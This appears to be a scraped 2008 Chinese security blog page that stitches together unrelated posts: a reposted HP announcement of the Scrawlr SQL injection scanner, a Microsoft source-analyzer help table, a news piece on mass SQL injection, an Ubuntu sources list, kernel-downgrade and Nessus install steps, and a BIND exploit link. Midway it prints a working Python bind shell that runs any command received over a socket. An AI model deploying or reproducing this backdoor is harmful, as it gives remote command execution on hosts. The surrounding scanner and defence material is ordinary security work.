You may say I am a dreamer,
But I am not the only one,
I hope someday you will join us,
And the world will live as one.
订阅数:147412工作的需要,要FUZZER?无聊,写了个4不像的PERL脚本,名曰TestFuzzer version1.0(后面再升级)。开始时在VM测试,一切正常,放到自己的机器上就发现有问题了,找了很久,最后才发现是ESET NOD32的问题(磁力很久前就和我提过,只是我不相信它那么流氓,禁用实时防护也没用),它把我们正常的SOCKET都引导到自己的进程(ekrn.exe)里去过滤了,唉。。。最后的结论是:NOD防住了别人,同时了自己也出不去了。。。
You have likely been tracking the mass SQL Injections that are currently sweeping through the net. Just last night I was shopping on www.ihomeaudio.com when I noticed they had been injected (they have since fixed their site). HP started to observe these attacks in January. They spread to over 500,000 sites by April before calming down and then picking up again in May. Most of the sites hit were initally Microsoft IIS ASP applications, causing many security companies to mistake this for some sort of new vulnerability in IIS and leading Microsoft to research the possibility, but alas, it's just our old friend, SQL Injection. Indeed we now see this attack hitting ASP and PHP sites and thanks to Google, it's easy to see just which sites out there have been hit.
While we were closely following the situation, the nice folks at Microsoft contacted us to see if we could work together to help people identify and cope with this issue. Together we quickly developed an action plan. The Microsoft Security Response Center (MSRC) was in a tough spot, hundreds of thousands of ASP sites were getting hacked, yet the vulnerability wasn't something Microsoft could release a patch for. SQL Injection is an issue that occurs because of poorly written web code interfacing with the web sites backend database and the solution was much more complicated than a simple patch. Developers were going to have to learn about security and were going to have to patch their code if they were going to solve this. Microsoft's Security Vulnerability Research & Defense has a blog about this problem as well where they share Microsoft's recomendations for this problem.
Now if you are no stranger to web security, you might be saying "well duh" right about now. Unfortunately to at least 500,000 sites on the Internet this concept is still pretty new and if you are one of the folks who are just now learning what SQL Injection is, I highly recomend you read HP's Web Security Research Group white papers on verbose and blind SQL injection located in our HP application security resource library.
Introducing HP Scrawlr
When Microsoft contacted us, they asked us to equip their customers with the tools necessary to quickly find SQL Injection vulnerabilities in their sites. HP's application security software, DevInspect, QAInspect and WebInspect all find SQL Injection and countless other security vulnerabilities. DevInspect can even inspect your source code for SQL Injection as well and guide developers through the process of fixing their code. But what if you need to just quickly look for SQL Injection before you decide how you are going handle the issue? We needed something quick, highly accurate and easy to download and install.
Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names!
Technical details for Scrawlr
Scrawlr does have some limitations versus our professional solutions and our fully functional SQL Injector tool
Download Scrawlr
You can download Scrawlr by visiting the following link: https://download.spidynamics.com/products/scrawlr/
Scrawlr is offered as-is and is not a supported product. Assistance may be available from other Scrawlr users in our online Scrawlr forum located at http://www.communities.hp.com/securitysoftware/forums/198.aspx
You can learn more about the HP Web Application Security Group and the HP Application Security Center by visiting our Security Community site at www.communities.hp.com/securitysoftware/ or by visiting our product information page at www.hp.com/go/securitysoftware/
| 文章编号 | : | 954476 |
| 最后修改 | : | 2008年6月27日 |
| 修订 | : | 1.1 |
简介更多信息
先决条件ASP
代码中的 SQL 注入问题用法
语法说明参数列表示例检查输出结果局限性参考| • | .NET Framework 3.0 |
| 参数 | 选项 | 说明 |
|---|---|---|
| /GlobalAsaPath | 路径 | 显示 Global.asa 文件的路径。 |
| /IncludePaths | 路径 | 使用虚拟路径显示所含的解析文件的路径,中间以分号分隔。 |
| /input | asp 文件 | 显示必须分析的 ASP 文件的绝对路径。 |
| /suppress warnings | 不报告警告。 | |
| /nologo | 不显示工具徽标。 | |
| /quiet | 不显示分析错误。如果您使用“/nologo”和“/quiet”开关,则只显示警告消息。 |
MSSCASI_ASP /input="c:\source\logon.asp"
MSSCASI_ASP /GlobalAsaPath="C:\source" /input="c:\source\webitems\display.asp"
MSSCASI_ASP /GlobalAsaPath="C:\source" /input="c:\source\webitems\display.asp" /IncludePaths="C:\virtualdirectory1;C:\virtualdirectory2"
MSSCASI_ASP /input="c:\source\webitems\display.asp" /suppress="80406;80407"
| 警告 | 说明 |
|---|---|
| 80400 | 在未经任何输入验证的情况下,从请求对象读取的数据中可能存在 SQL 注入漏洞。这些警告很可能是必须修补的 bug。 |
| 80406 | 在通过某些可能执行数据验证的未知函数调用来传递输入数据的情况下,从请求对象读取的数据中可能存在 SQL 注入漏洞。如果函数调用内部未进行数据验证,这些警告很可能是 bug。否则,这些警告为误报。 |
| 80403 | 来自于后端服务器的数据中可能存在 SQL 注入漏洞。如果这些数据是由最终用户通过其他网站控制,则这些警告很可能是 bug。但是,如果这些数据可信度很高,则这些警告可能不是 bug。作为深度防御策略的一部分,实行查询的参数化不失为一种好做法。 |
| 80407 | 来自于后端服务器并通过某些未知函数调用的数据中可能存在 SQL 注入漏洞。如果这些数据是由最终用户通过其他网站控制,并且未对这些数据进行数据验证,则这些警告很可能是 bug。 |
| 80420 | 函数参数中可能存在 SQL 注入漏洞。这些警告是在函数作用域生成的。因此,如果这些函数参数值的来源可信,则这些警告为误报。如果这些参数值是由最终用户控制,则这些警告很可能是 bug。您可以对这些函数参数使用 __sql_pre_validated 批注来检测最终用户是否能够访问此代码。 |
| 80421 | 在通过某些可能执行数据验证的未知函数调用传递的函数参数中可能存在 SQL 注入漏洞。您可以对这些函数参数使用 __sql_pre_validated 批注并对验证函数使用 __sql_validate 来检测最终用户是否能够访问此代码。 |
| • | 此工具只能解析使用 VBScript 编写的 ASP 代码。它目前无法解析使用其他任何语言(如 Jscript)编写的服务器端代码。 |
| • | 作为此工具开发过程的一部分,我们开发了新的 ASP 分析器。但是,此分析器无法涵盖所有 ASP 构造。因此,您可能会发现某些分析错误。 |
| • | Microsoft ASP.NET 2.0 |
关键字: |
atdownload kbexpertiseadvanced kbcode kbexpertiseinter kbinfo kbsecadvisory kbsecurity kbsecvulnerability KB954476 |
By Robert Westervelt, News Editor
24 Jun 2008 | SearchSecurity.com
Microsoft is alerting customers to several tools that could bolster Web application development in the wake of a rising number of SQL injection attacks targeting faulty code in websites.
The software giant recommended customers use the tools in a security advisory Tuesday. It warned customers that it was tracking a rising number of attacks on websites that use Microsoft ASP and ASP.NET technologies. The problem lies with tiny software coding flaws that are difficult to detect.
"These SQL injection attacks do not exploit a specific software vulnerability, but instead, target websites that do not follow secure coding practices for accessing and manipulating data stored in a relational database," said Bill Sisk, Microsoft's security response communications (MSRC) manager.
Researchers had been tracking the mass SQL injection on thousands of websites over the last several months. The attacks are automated, using a number of hacker toolkits that can be purchased on the black market. Ultimately, the attack triggers an error on the server hosting the Web application, allowing the attacker to insert his own code and gain access to the system. Its unclear how many sites have been compromised.
In its advisory to customers, Microsoft identified Scrawlr, a vulnerability scanner co-developed by Hewlett Packard and researchers at the MSRC, which identifies whether a website is susceptible to SQL injection. In a blog entry, HP's Erik Peterson, senior director of products for the application security center, said the tool is not as robust as the vendor's fully supported products, but it is a free and fast way to analyze a website for potential problems. The tool can't identify the line of code responsible and will only crawl up to 1,500 pages. It doesn't support sites requiring authentication and won't test forms for SQL injection, among other limitations, he said.
UrlScan version 3.0 Beta is a tool developed by Microsoft that blocks HTTP requests. Microsoft said the tool will stop harmful requests from reaching the Web application on the server. The tool is designed to read the configuration from the urlscan.ini file. Multiple instances of the tool can be installed to serve as URL filters. It can be tweaked by an administrator to restrict the types of requests processed by the Internet Information Services (ISS).
Microsoft Source Code Analyzer for SQL Injection is also available to detect ASP code susceptible to SQL injection attacks. It generates a report that displays the coding issue. Microsoft admits that the tool also has some limitations -- it only addresses ASP code written in VBScript, and its use could result in some parsing errors.
Putting the tools in the hands of Web developers and IT administrators could help accelerate security awareness in the same way poor product quality did in the mid-90s, said Amrit Williams, a former Gartner analyst, now chief technology officer at BigFix. Williams cautioned that the tools are not a substitute for more advanced technologies or experienced and thorough human analysis.
"Unfortunately it always takes a significant incident to drive folks towards doing the right thing," Williams said in an email exchange. "This is especially true of security as part of the software development life cycle and even more so for Web development, which tends to be rapid, ad-hoc and less structured than traditional software development."
最近做的一个傻瓜实验,做实验的原因还是因为和客户探讨的问题,现在的客户越来越强了,都开始觉得跟不上他们的步伐了,再不努力很快我们就都要失业了:P
#deb cdrom:[Ubuntu 8.04 _Hardy Heron_ - Release i386
(20080423)]/ hardy main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to
upgrade to
# newer versions of the distribution.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy main restricted
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy main
restricted
## Major bug fix updates produced after the final release of
the
## distribution.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates main
restricted
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates main
restricted
## N.B. software from this repository is ENTIRELY UNSUPPORTED by
the Ubuntu
## team, and may not be under a free licence. Please satisfy
yourself as to
## your rights to use the software. Also, please note that software
in
## universe WILL NOT receive any review or updates from the Ubuntu
security
## team.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy universe
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy universe
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates universe
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates
universe
## N.B. software from this repository is ENTIRELY UNSUPPORTED by
the Ubuntu
## team, and may not be under a free licence. Please satisfy
yourself as to
## your rights to use the software. Also, please note that software
in
## multiverse WILL NOT receive any review or updates from the
Ubuntu
## security team.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy multiverse
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy multiverse
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates
multiverse
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates
multiverse
## Uncomment the following two lines to add software from the
'backports'
## repository.
## N.B. software from this repository may not have been tested
as
## extensively as that contained in the main release, although it
includes
## newer versions of some applications which may provide useful
features.
## Also, please note that software in backports WILL NOT receive
any review
## or updates from the Ubuntu security team.
# deb http://cn.archive.ubuntu.com/ubuntu/ hardy-backports main
restricted universe multiverse
# deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-backports main
restricted universe multiverse
## Uncomment the following two lines to add software from
Canonical's
## 'partner' repository. This software is not part of Ubuntu, but
is
## offered by Canonical and the respective vendors as a service to
Ubuntu
## users.
# deb http://archive.canonical.com/ubuntu hardy partner
# deb-src http://archive.canonical.com/ubuntu hardy partner
# Line commented out by installer because it failed to verify:
#deb http://security.ubuntu.com/ubuntu hardy-security main
restricted
# Line commented out by installer because it failed to verify:
#deb-src http://security.ubuntu.com/ubuntu hardy-security main
restricted
# Line commented out by installer because it failed to verify:
#deb http://security.ubuntu.com/ubuntu hardy-security universe
# Line commented out by installer because it failed to verify:
#deb-src http://security.ubuntu.com/ubuntu hardy-security
universe
# Line commented out by installer because it failed to verify:
#deb http://security.ubuntu.com/ubuntu hardy-security
multiverse
# Line commented out by installer because it failed to verify:
#deb-src http://security.ubuntu.com/ubuntu hardy-security
multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy main restricted universe
multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-security main restricted
universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-updates main restricted
universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-proposed main restricted
universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-backports main restricted
universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy main restricted
universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-security main
restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-updates main
restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-proposed main
restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-backports main
restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu-cn/ gutsy main restricted
universe multiverse
deb http://www.debian-multimedia.org etch main
deb http://www.debian-multimedia.org testing main
最近因为一些关系,需要对LINUX的内核进行更换操作,记下了操作过程,希望各位拍砖:
原系统:Fedora Core 9
Linux localhost.localdomain 2.6.25-14.fc9.i686 #1 SMP Thu May 1
06:28:41 EDT 2008 i686 i686 i386 GNU/Linux
需要降级为:
linux-2.6.24.6
具体操作:
[root@localhost ~]# cd /usr/local/sbin
[root@localhost sbin]# wget
http://www.de.kernel.org/pub/linux/kernel/v2.6/linux-2.6.24.6.tar.gz
[root@localhost sbin]# tar -zxvf linux-2.6.24.6.tar.gz
[root@localhost sbin]# mv linux-2.6.24.6 linux
[root@localhost sbin]# ln -s /usr/local/sbin/linux
/usr/src/linux
[root@localhost sbin]# cd /usr/src/linux
[root@localhost linux]# make
mrproper
<--删除以前的.o文件,第一次运行其实这步可以省略
[root@localhost linux]# make menuconfig
[root@localhost linux]# make
dep
<--建立依赖关系,第一次运行其实这步可以省略
*** Warning: make dep is unnecessary now.
[root@localhost linux]# make
clean
<--删除没用的文件
[root@localhost linux]# make
bzImage
<--编译内核
[root@localhost linux]# make
modules
<--编译模块
[root@localhost linux]# make
modules_install
<--安装模块
[root@localhost linux]# make
install
<--这步是建立initrd(加载LKM用的程序)
[root@localhost linux]# new-kernel-pkg --install --mkinitrd
--depmod 2.6.24.6 <--写入grub.conf
[root@localhost linux]# shutdown -r now
重启后的升级结果是:
Linux localhost.localdomain 2.6.24.6 #1 SMP Tue Aug 26 23:15:14 CST
2008 i686 i686 i386 GNU/Linux
#!/usr/bin/python
#code by demonalex@163.com
import socket;
import os;
address=raw_input("Server Address:");
print "Repeat: Server Address:",address,"!";
port=raw_input("Port:");
print "Repeat: Port:",port,"!";
HOST=address;
PORT=int(port);
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,6);
s.bind((HOST,PORT));
s.listen(1);
conn, addr = s.accept();
#print "Connect by ",addr,"!";
while(1):
conn.send("(");
conn.send(os.getcwd());
conn.send(")command:");
data=conn.recv(1024);
if not data: break;
#print data,":",len(data);
if (data[0:3]=='cd '):
curr_dir=data[3:].strip();
os.chdir(curr_dir);
continue;
if ((data[1]==':')and(len(data)==3)):
curr_dir=data.strip();
os.chdir(curr_dir);
continue;
if (data=="exit\n"):
conn.send("bye!\n");
break;
result=os.popen(data).read();
conn.send(result);
conn.close;
s.close;
Ubuntu下安装nessus
writer: demonalex[at]dark2s[dot]org
{运行环境}
操作系统: Ubuntu 8.04桌面版(2.6.24-16-generic #1 SMP)
nessus: version 2.2.9
{安装过程}
root@demonalex-laptop:~# apt-get update
root@demonalex-laptop:~# apt-get -y install nessus nessusd
nessus-plugins
{配置过程}
安装完成后通过nessus-adduser添加用户:
root@demonalex-laptop:~# nessus-adduser
Using /var/tmp as a temporary file holder
Add a new nessusd user
----------------------
Login :
admin
<--输入新建用户名
Authentication (pass/cert) [pass]
: <--直接回车(通过密码认证)
Login password
:
<--输入密码
Login password (again)
:
<--再次输入密码
User rules
----------
nessusd has a rules system which allows you to restrict the
hosts
that admin has the right to test. For instance, you may want
him to be able to scan his own host only.
Please see the nessus-adduser(8) man page for the rules syntax
Enter the rules for this user, and hit ctrl-D once you are done
:
(the user can have an empty rules
set)
<--按Ctrl+D继续
Login
: admin
Password :
***********
DN
:
Rules
:
Is that ok ? (y/n)
[y]
<--直接回车(确认添加操作)
user added.
root@demonalex-laptop:/usr/bin# nessus-fetch --register 你的序列号
{升级}
root@demonalex-laptop:~# nessus-update-plugins
{运行}
首先运行服务端:
root@demonalex-laptop:~# nessusd -D
然后进入桌面,选择运行Panel上的“Application->Internet->Nessus”,在弹出的nessus
GUI客户端
的“Nessusd Host”分页中输入帐号与密码,然后按“Log in”按钮,待登录成功后将自动跳到“Plugins”
分页,选择要扫描的插件,然后手工进入“Target”分页,输入扫描目标IP地址,最后“Start the scan”
按钮,待扫描完成后就可以看到报告窗口了。
运行结果:
另外,会在同一目录下生成uselog.txt的日志文件.继承原来的get系列程序,但这次是"开源",哈哈:D,因为还是很烂的缘故,希望各位大侠帮忙改改:P,代码与测试素材的下载地址在这里:www.i170.com/Attach/39450C6D-8D05-4493-91B0-E2FC48458768
,不想下载的话可以直接看下面的代码:
#BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
#http://www.milw0rm.com/exploits/6123
http://security.ctocio.com.cn/securitycomment/122/8210122.shtml
wiki.ubuntu.org.cn/Apt-get%E4%BD%BF%E7%94%A8%E6...
forum.ubuntu.com.cn/viewtopic.php?t=65707&highl...
Powered by Haiwit
回到顶端